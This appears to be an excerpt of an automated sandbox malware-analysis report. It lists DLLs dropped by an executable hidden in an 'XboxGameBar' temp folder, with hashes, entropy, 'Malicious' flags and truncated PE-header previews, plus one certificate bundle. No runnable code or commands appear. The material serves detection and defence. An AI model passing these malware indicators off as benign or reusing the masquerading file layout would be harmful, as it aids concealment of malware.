                                                                                                                                                                                                                                        SSDEEP:3072:LMaGbIQQbN9W3PiNGeA66l8rBk3xA87xfCA+nbUtFMsVjTNbEzc+pIPC7ODxd:LMaG0bN96oG1l8YA8ZMSR+E
                                                                                                                                                                                                                                        MD5:208B0108172E59542260934A2E7CFA85
                                                                                                                                                                                                                                        SHA1:1D7FFB1B1754B97448EB41E686C0C79194D2AB3A
                                                                                                                                                                                                                                        SHA-256:5160500474EC95D4F3AF7E467CC70CB37BEC1D12545F0299AAB6D69CEA106C69
                                                                                                                                                                                                                                        SHA-512:41ABF6DEAB0F6C048967CA6060C337067F9F8125529925971BE86681EC0D3592C72B9CC85DD8BDEE5DD3E4E69E3BB629710D2D641078D5618B4F55B8A60CC69D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........p...p...p....8..p.......p.......p.......p.......p..N....p...p...q.......p..N....p..N....p..N.T..p..N....p..Rich.p..........................PE..d...'..d.........." ..."............l+..............................................NS....`.............................................d...t........`.......P.......F.../...p..8...0...T...............................@............................................text............................... ..`.rdata..............................@..@.data....j.......f..................@....pdata.......P......."..............@..@.rsrc........`......................@..@.reloc..8....p.......8..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):25360
                                                                                                                                                                                                                                        Entropy (8bit):6.6307231018245325
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:SR9ZfwFpEWE6ivQpIPZwGjHQIYiSy1pCQKzmPxh8E9VF0NyptVQcM:SRvqpEM4QpIPZw65YiSyvamPxWE3PS
                                                                                                                                                                                                                                        MD5:46E9D7B5D9668C9DB5CAA48782CA71BA
                                                                                                                                                                                                                                        SHA1:6BBC83A542053991B57F431DD377940418848131
                                                                                                                                                                                                                                        SHA-256:F6063622C0A0A34468679413D1B18D1F3BE67E747696AB972361FAED4B8D6735
                                                                                                                                                                                                                                        SHA-512:C5B171EBDB51B1755281C3180B30E88796DB8AA96073489613DAB96B6959A205846711187266A0BA30782102CE14FBFA4D9F413A2C018494597600482329EBF7
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h%p..K#..K#..K#.q.#..K#.uJ"..K#.uN"..K#.uO"..K#.uH"..K#.uJ"..K#.qJ"..K#..J#..K#.uC"..K#.uK"..K#.u.#..K#.uI"..K#Rich..K#................PE..d......d.........." ...".....&...... ........................................p.......p....`.........................................`)..L....)..x....P.......@.......4.../...`..@...`#..T........................... "..@............ ..8............................text...h........................... ..`.rdata....... ......................@..@.data........0.......$..............@....pdata.......@.......&..............@..@.rsrc........P.......(..............@..@.reloc..@....`.......2..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):37888
                                                                                                                                                                                                                                        Entropy (8bit):5.536883608844324
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:wQm5druFG/nDOnnvM7+gu305jTbEsU4qtp3/G0mTtAeSUhCE3umLUn0qQlwwHQoY:W58OSE7Gs+D/xmTllQFqLgM6/0
                                                                                                                                                                                                                                        MD5:4B5DCC46170E4AC810A59CA5B7533462
                                                                                                                                                                                                                                        SHA1:1EACF60FDFD427909B54F83518612A4638930225
                                                                                                                                                                                                                                        SHA-256:704CDCFCA773AC658B8F84335F29630707C216F739F7FA5970B1BE57F13A5B82
                                                                                                                                                                                                                                        SHA-512:C2E5B9B40F267F375234BE9A562882FAA1A0E82F32A951233464D27879D0B1620099BB800DE3E96BE277BB3BB44FF421A98A2F0C125F28652C2B6415D0FB4DEA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........IT..'...'...'.......'...&...'...&...'..."...'...#...'...$...'.;.&...'...&.".'.w./...'.w.'...'.w.....'.w.%...'.Rich..'.........PE..d....).c.........." ...".P...H.......R....................................................`..........................................z..`....{..d...............8....................r...............................q..@............`...............................text...(N.......P.................. ..`.rdata..L*...`...,...T..............@..@.data...............................@....pdata..8...........................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):207872
                                                                                                                                                                                                                                        Entropy (8bit):6.104353771977755
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:Q1Krrzce1C8X3N/2AZXIQ+FvcSpOXelJfNgDdZgFqrrP:nrzxjXRhAQehgDdiFGr
                                                                                                                                                                                                                                        MD5:A7B4711C5BA1866745485ABE14101AC7
                                                                                                                                                                                                                                        SHA1:C37158CBD0FE67F8ACD61596F63CF62BD2985431
                                                                                                                                                                                                                                        SHA-256:6688F3DD5B7EFA8008C5BA776F32CECF5B42887B1B9EE21555AE3E0D4F13D2E0
                                                                                                                                                                                                                                        SHA-512:F952AD3C21B649E13E64540713A61DB6D49B394CA5D62ADD7A5FEC2186A8D27131BA038D449561B77670D3DEB2358A8254E4E205EF20228E27B1EB8234D0E843
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h~~...-...-...-.q.-...-.u.,...-.q.,...-Mr.,...-...-...-.u.,...-.u.,...-.u.,...-.u.,...-.u.,...-.u.-...-.u.,...-Rich...-........................PE..d....).c.........." ...".`..........Pc....................................................`.............................................h...X...d....p.......`..h......................................................@............p.. ............................text....^.......`.................. ..`.rdata...r...p...t...d..............@..@.data....e.......>..................@....pdata..h....`......................@..@.rsrc........p.......$..............@..@.reloc...............&..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):34816
                                                                                                                                                                                                                                        Entropy (8bit):5.620393374613542
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:zVFT6fGGeAoBw4L0Slb3KFHzZgnq/A5MnOty9+AetDHVsSWBDPMEYcAe9hNugNYU:zTG3hzuot+AAaLIEYclH+uLB3
                                                                                                                                                                                                                                        MD5:2F2A2B2343549E990419DF0977E3FAC9
                                                                                                                                                                                                                                        SHA1:5724B63E32BDA7D36285F79DC9AD57FC97BA5415
                                                                                                                                                                                                                                        SHA-256:9569B0B501A0235388D075BAA4C84E5D571169AC6CE3AE9220CDE31A5F208B94
                                                                                                                                                                                                                                        SHA-512:A1B99DCAF01666C3AB9755D55001F3A18344CD70C386CE1B2233B5C6B8248B59D95804B450F9EE9C2F51D6293C4E748B9347540AE3F247418A1673BBD6EF466A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........IZ..'...'...'.......'..&...'..&...'.."...'..#...'..$...'.+.&...'...&./.'.g./...'.g.'...'.g.....'.g.%...'.Rich..'.................PE..d....).c.........." ...".L...........O....................................................`..........................................x..h....x..d....................................p...............................o..@............`...............................text....J.......L.................. ..`.rdata..:'...`...(...P..............@..@.data....L...........x..............@....pdata...............~..............@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):24064
                                                                                                                                                                                                                                        Entropy (8bit):5.3682936455537416
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:/NyocbRskh0rtT4vl8823C0/FCvNeu71vWRt7ARlgTeVycRguvNOM7:4ocd5hpdWCc3YoIIM7
                                                                                                                                                                                                                                        MD5:AA40AC7A7D1D9A10DA426701EA49508D
                                                                                                                                                                                                                                        SHA1:BBD083535E20EA00BCC40DE7B9E625FF5C74851E
                                                                                                                                                                                                                                        SHA-256:B892CBAF1A5B363FB66768194CD4D466916E81981BCB63C2989277114A4B0C10
                                                                                                                                                                                                                                        SHA-512:EAF14159F5F1B70DCB5E6416804F306EC5F4C235ABF431A27BC421861117BE8C6EC5326C8C703C4C3764B771E5DBAC37E6B93AC05F9A632BC83788C476EED8E2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ID..'...'...'.......'..&...'..&...'.."...'..#...'..$...'.+.&...'...&...'.g./...'.g.'...'.g.....'.g.%...'.Rich..'.........................PE..d....).c.........." ...".,...4......./....................................................`......................................... S..d....S..d............p.......................L..............................`K..@............@..@............................text....*.......,.................. ..`.rdata..z....@... ...0..............@..@.data...8....`.......P..............@....pdata.......p.......V..............@..@.rsrc................Z..............@..@.reloc...............\..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):301568
                                                                                                                                                                                                                                        Entropy (8bit):6.375720417060108
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:GSL1oP995ooVABNirLq0l/IzkQ37P6BdeAb6:Gh19NO7irLq0l/IzB37Pe6
                                                                                                                                                                                                                                        MD5:03EF5E8DA65667751E1FD3FA0C182D3E
                                                                                                                                                                                                                                        SHA1:4608D1EFCA23143006C1338DEDA144A2F3BB8A16
                                                                                                                                                                                                                                        SHA-256:3D1C66BDCB4FA0B8E917895E1B4D62EE14260EAA1BD6FE908877C47585EC6127
                                                                                                                                                                                                                                        SHA-512:C094A3DFBD863726524C56DAB2592B3513A3A8C445BCAAC6CFB41A5DDEC3079D9B1F849C6826C1CC4241CA8B0AA44E33D2502BB20856313966AF31F480BA8811
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........M.R.#GR.#GR.#G[..GT.#G."FP.#G.&FB.#G.'FU.#G. FQ.#G.."FP.#G."FQ.#GR."G=.#GR.#G..#G.#FS.#G.!FS.#GRichR.#G........................PE..d.....Bc.........." ...!.J...N.......*....................................................`..........................................o..T...Dp..................."......................T.......................(...p...@............`..p............................text...GI.......J.................. ..`.rdata.......`.......N..............@..@.data...x............l..............@....pdata...".......$...n..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):278952
                                                                                                                                                                                                                                        Entropy (8bit):6.049041164740881
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:QW1H/M8fRR0mNplkXCRrVADwYCuCigT/Q5MSRqNb7d86:QWN/TRLNLWCRrI55MWavdJ
                                                                                                                                                                                                                                        MD5:8D0619BFE30DEADF6F21196F0F8D53D3
                                                                                                                                                                                                                                        SHA1:E7ABD65A8CCAFEFF6CAF6A2FF98D27D24D87C9AD
                                                                                                                                                                                                                                        SHA-256:B301535DCA491D9814EA28FAA320AC7A19D0F5D94237996FA0A3B5A936432514
                                                                                                                                                                                                                                        SHA-512:5A88E4A06B98832AAA9BBB89E382F6C7E9B65C5ECBA48DE8F4FF1FA58BB06A74B9C2F6B2EC185C2A306CB0B5D68D0B28D74B323432A0B2953D8DFC29FED920D7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Label: "GlobalSign Root CA".# Serial: 4835703278459707669005204.# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a.# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c.# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99.-----BEGIN CERTIFICATE-----.MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG.A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv.b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw.MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i.YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT.aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ.jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp.xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):10752
                                                                                                                                                                                                                                        Entropy (8bit):4.663205590455457
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:qlTp72HzA5iJewkY0hQMsQJCUCLsZEA4elh3XQMtCFNGioUjQcX6g8cim1qeSju1:ql12HzzjBbRYoesfoRcqgvimoe
                                                                                                                                                                                                                                        MD5:FA50D9F8BCE6BD13652F5090E7B82C4D
                                                                                                                                                                                                                                        SHA1:EE137DA302A43C2F46D4323E98FFD46D92CF4BEF
                                                                                                                                                                                                                                        SHA-256:FFF69928DEA1432E0C7CB1225AB96F94FD38D5D852DE9A6BB8BF30B7D2BEDCEB
                                                                                                                                                                                                                                        SHA-512:341CEC015E74348EAB30D86EBB35C028519703006814A2ECD19B9FE5E6FCB05EDA6DDE0AAF4FE624D254B0D0180EC32ADF3B93EE96295F8F0F4C9D4ED27A7C0C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........=.V\..V\..V\.._$..T\... ..T\...$..T\... ..]\... ..^\... ..U\... ..U\..V\..p\.. ..W\.. ..W\.. z.W\.. ..W\..RichV\..........................PE..d......d.........." ...".....................................................p............`..........................................'..p...`(..d....P.......@...............`..,...`#.............................. "..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):115712
                                                                                                                                                                                                                                        Entropy (8bit):5.890497931382238
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:rKLwVA2epJbdfD3NTSGkzsvDNIWN4ZgibPq0kgIWgymA5TGK2MLVur:rKL/dhTMzsbNd9ibPavPA5TGK7Qr
                                                                                                                                                                                                                                        MD5:2D1F2FFD0FECF96A053043DAAD99A5DF
                                                                                                                                                                                                                                        SHA1:B03D5F889E55E802D3802D0F0CAA4D29C538406B
                                                                                                                                                                                                                                        SHA-256:207BBAE9DDF8BDD64E65A8D600FE1DD0465F2AFCD6DC6E28D4D55887CD6CBD13
                                                                                                                                                                                                                                        SHA-512:4F7D68F241A7F581E143A010C78113154072C63ADFF5F200EF67EB34D766D14CE872D53183EB2B96B1895AA9C8D4CA82EE5E61E1C5E655FF5BE56970BE9EBE3E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................o.........................................5...........m...L.....L.......L.......L.......Rich............................PE..d......d.........." ...".(...........,....................................................`.........................................P...d.......................................$...pu..............................0t..@............@...............................text....'.......(.................. ..`.rdata...S...@...T...,..............@..@.data...x8.......,..................@....pdata..............................@..@.rsrc...............................@..@.reloc..$...........................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):6673920
                                                                                                                                                                                                                                        Entropy (8bit):6.582002531606852
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:98304:EzN+T+xtLlk0PPMAiGoTzeDy3x8lGBlWi9Nk:E5Y6Jk0PPMtfTzp3x8c
                                                                                                                                                                                                                                        MD5:486085AAC7BB246A173CEEA0879230AF
                                                                                                                                                                                                                                        SHA1:EF1095843B2A9C6D8285C7D9E8E334A9CE812FAE
                                                                                                                                                                                                                                        SHA-256:C3964FC08E4CA8BC193F131DEF6CC4B4724B18073AA0E12FED8B87C2E627DC83
                                                                                                                                                                                                                                        SHA-512:8A56774A08DA0AB9DD561D21FEBEEBC23A5DEA6F63D5638EA1B608CD923B857DF1F096262865E6EBD56B13EFD3BBA8D714FFDCE8316293229974532C49136460
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......QN.../.../.../...W(../......./......./......./......./...R.../...Z.../..^W.../.../...-../...",......./.../.../......./......./..Rich./..........PE..d...M7ee.........." ...&..M..........L...................................... f...........`......................................... .a.p.....a.|............Pb..............Pe.p...p.[.T.....................[.(...0.[.@............0M..............................text.....M.......M................. ..`.rdata.......0M.......M.............@..@.data........0a.......a.............@....pdata.......Pb.......b.............@..@.reloc..p....Pe.......e.............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):51712
                                                                                                                                                                                                                                        Entropy (8bit):5.664902275560485
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:cXkHpFLJOXgD7JKgegsvC1wryTXkHjQwDchoPWmzDD/:cXkH/Qswge1WwryTXk8mchoPWmz
                                                                                                                                                                                                                                        MD5:34C2DD52C9E920E035444D6CBDDEB555
                                                                                                                                                                                                                                        SHA1:3FF99987B968261E88032652917F137D4A6A0493
                                                                                                                                                                                                                                        SHA-256:55814D323EE1EC6CD6145AE8F43DBF44D9481E3592AA17B5A17010F7E401FF42
                                                                                                                                                                                                                                        SHA-512:8F0BE0A3E2588BDEFF9F5C4EB728AE43A58A19B91596ADCA0C931D5425A591178F13DCEF68B1B949A2C805E1B9963800397F661688FD3C299D7084EFE45ADAF7
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...rx.^rx.^rx.^{.A^px.^..._px.^9.._px.^..._.x.^..._zx.^..._qx.^..._qx.^rx.^.x.^..._sx.^..._sx.^..-^sx.^..._sx.^Richrx.^........................PE..d....jjc.........." ...!.x...V.......{....................................... ............`............................................h...X...d...................................@...................................@...............p............................text...Xv.......x.................. ..`.rdata...1.......2...|..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3445016
                                                                                                                                                                                                                                        Entropy (8bit):6.099467326309974
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:98304:+/+YgEQaGDoWS04ki7x+QRsZ51CPwDv3uFfJx:MLgEXGUZ37x+VZ51CPwDv3uFfJx
                                                                                                                                                                                                                                        MD5:E94733523BCD9A1FB6AC47E10A267287
                                                                                                                                                                                                                                        SHA1:94033B405386D04C75FFE6A424B9814B75C608AC
                                                                                                                                                                                                                                        SHA-256:F20EB4EFD8647B5273FDAAFCEB8CCB2B8BA5329665878E01986CBFC1E6832C44
                                                                                                                                                                                                                                        SHA-512:07DD0EB86498497E693DA0F9DD08DE5B7B09052A2D6754CFBC2AA260E7F56790E6C0A968875F7803CB735609B1E9B9C91A91B84913059C561BFFED5AB2CBB29F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........).h.z.h.z.h.z..Oz.h.z...{.h.z...{.h.z...{.h.z...{.h.z.h.zjh.z...{.h.z=..{.h.z=..{.j.z=..{.h.z=.#z.h.z=..{.h.zRich.h.z........................PE..d.....wd.........." ..."..$...................................................5......o5...`..........................................y/..h...J4.@.....4.|....p2......b4../....4..O..P.,.8.............................,.@............@4..............................text...$.$.......$................. ..`.rdata........$.......$.............@..@.data...!z....1..,....1.............@....pdata..h....p2.......1.............@..@.idata..^#...@4..$....3.............@..@.00cfg..u....p4.......3.............@..@.rsrc...|.....4.......3.............@..@.reloc...y....4..z....3.............@..B................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):39696
                                                                                                                                                                                                                                        Entropy (8bit):6.641880464695502
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:NiQfxQemQJNrPN+moyijAc5YiSyvkIPxWEqG:dfxIQvPkmoyijP7SytPxF
                                                                                                                                                                                                                                        MD5:0F8E4992CA92BAAF54CC0B43AACCCE21
                                                                                                                                                                                                                                        SHA1:C7300975DF267B1D6ADCBAC0AC93FD7B1AB49BD2
                                                                                                                                                                                                                                        SHA-256:EFF52743773EB550FCC6CE3EFC37C85724502233B6B002A35496D828BD7B280A
                                                                                                                                                                                                                                        SHA-512:6E1B223462DC124279BFCA74FD2C66FE18B368FFBCA540C84E82E0F5BCBEA0E10CC243975574FA95ACE437B9D8B03A446ED5EE0C9B1B094147CEFAF704DFE978
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".H...(.......L...............................................n....`......................................... l.......p..P...............P....l.../......,...@d...............................c..@............`.. ............................text....G.......H.................. ..`.rdata..h....`.......L..............@..@.data................b..............@....pdata..P............d..............@..@.reloc..,............j..............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):704792
                                                                                                                                                                                                                                        Entropy (8bit):5.55753143710539
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:ihO7/rNKmrouK/POt6h+7ToRLgo479dQwwLOpWW/dQ0T9qwfU2lvzA:iis/POtrzbLp5dQ0T9qcU2lvzA
                                                                                                                                                                                                                                        MD5:25BDE25D332383D1228B2E66A4CB9F3E
                                                                                                                                                                                                                                        SHA1:CD5B9C3DD6AAB470D445E3956708A324E93A9160
                                                                                                                                                                                                                                        SHA-256:C8F7237E7040A73C2BEA567ACC9CEC373AADD48654AAAC6122416E160F08CA13
                                                                                                                                                                                                                                        SHA-512:CA2F2139BB456799C9F98EF8D89FD7C09D1972FA5DD8FC01B14B7AF00BF8D2C2175FB2C0C41E49A6DAF540E67943AAD338E33C1556FD6040EF06E0F25BFA88FA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........q...q...q.....q..p...q..p...q..t...q..u...q..r...q.[.p...q...p.u.q.[.u...q.[.q...q.[.....q.[.s...q.Rich..q.........................PE..d.....wd.........." ...".D...T......<.....................................................`..........................................A...N..@U..........s........N......./......h.......8...............................@............@..@............................text....B.......D.................. ..`.rdata.../...`...0...H..............@..@.data...AM.......D...x..............@....pdata...V.......X..................@..@.idata..%W...@...X..................@..@.00cfg..u............l..............@..@.rsrc...s............n..............@..@.reloc..q............v..............@..B................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):46592
                                                                                                                                                                                                                                        Entropy (8bit):5.344765898080963
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:i005Gi4zzWerZi5s+AP6tzPVtLZ9rthfBie/4jejOcmKnNrODgYMjtNtnlsht6oR:thWu6tVlBiIjnVOIjbMrYyeW
